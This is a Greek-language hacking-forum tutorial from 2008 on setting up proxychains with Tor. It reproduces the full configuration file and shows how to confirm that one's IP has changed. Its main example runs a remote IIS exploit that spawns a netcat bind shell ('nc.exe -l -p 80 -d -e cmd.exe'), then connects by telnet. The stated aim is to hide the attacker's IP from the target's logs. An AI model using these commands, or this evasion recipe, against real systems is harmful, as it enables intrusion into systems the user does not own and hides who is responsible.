How to proxify console data

Submitted by tanZo0n on Wed, 09/10/2008 - 22:53

How to proxify console data

@uthor : t@nzo0n [for codebomb.org]

Σε αυτο το tutorial θα σας δείξω πως μπορούμε να περάσουμε τα δεδομένα απο την κονσόλα πχ (telnet,netcat,exploits) μεσω proxy.

Θα χρησιμοποιήσουμε το proxychains toolaki το οποίο ειναι διαθέσιμο στο :
(http://proxychains.sourceforge.net/)

Εγκατάσταση :

Κατεβάστε το αρχείο proxychains-3.1.tar.gz

Αποσυμπιέστε το : # tar -xvzf proxychains-3.1.tar.gz

Και μετα κάντε τα επόμενα βήματα :

# cd proxychains-3.1
# ./configure
# sudo make
# sudo make install

Εχει και περισσοτερες οδηγίες στο README και INSTALL αρχείο.

Ωραία!! Το έχουμε σεταρει χωρίς κανένα σφάλμα... Στο αρχείο /etc/proxychains.conf μπορείτε να βάλετε τα proxy που θέλετε να χρησιμοποιήσετε.
Όπως θα ξέρετε όμως τα σπανια να βρείς ενα alive proxy ή ακόμα και να βρείς θα "κλείσει" μετα απο κάποιο χρονικό διάστημα..Οπότε μία καλύτερη λύση ειναι να χρησιμοποιήσουμε το TOR. Το Proxychains ειναι ρυθμισμένο απο την αρχη να δουλεύει με το TOR χωρίς να κάνετε οποιαδήποτε αλλαγη μέσα στο αρχειο. Ααα!! btw το αρχειο ειναι αυτο :

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050

και οπώς βλέπετε κάτω κάτω είναι ρυθμισμένο για το TOR . Μπορείτε να το διαβάσετε λιγο και να το configourarete ανάλογα με το πώς το θέλετε.

Παράδειγμα :

Ας πούμε οτι έχουμε να τρέξουμε ενα exploit σε ενα remote συστημα..

# ./unicodeexecute3.pl <remote_ip>:80 'c:\nc.exe -l -p 80 -d -e cmd.exe'
# telnet <remote_ip> 80

Υπο κανονικές συνθήκες μόλις συνδεθείτε στο στόχο το ip σας θα καταγραφει.
Να πως θα κάνετε την ίδια δουλειά με το proxychains.

# proxychains ./unicodeexecute3.pl <remote_ip>:80 'c:\nc.exe -l -p 80 -d -e cmd.exe'
# proxychains telnet <remote_ip> 80

Θα μου πείτε βεβαια πως θα καταλάβω αν πέτυχε το proxy... Ε λοιπόν υπάρχει και για αυτο μια απάντηση. Θα χρησημοποιήσουμε ακόμα μια εφαρμογή κονσόλας του linux που ονομάζεται lynx . Ειναι εν ολιγοις είναι ενας web browser κονσόλας. Τρέχοντας :

# lynx www.google.com

θα ανοίξει το google χωρίς γραφικά βεβαια.

Λοιπόν έχουμε και λέμε ... Ανοίξτε πάλι το /etc/proxychains.conf αρχείο και κάντε comment την παρακάτω γραμμή :

# Proxy DNS requests - no leak for DNS data
proxy_dns (comment αυτήν την γραμμή βάζοντας #" απο μπροστά)

Σωστε τις αλλαγές στο αρχείο και τρέξτε στην κονσόλα :

# proxychains lynx www.whatismyip.com
ή
# proxychains lynx www.findmyip.com

Η Ip σας πιθανότατα εχει αλλάξει...

Happy Hacking ;)!!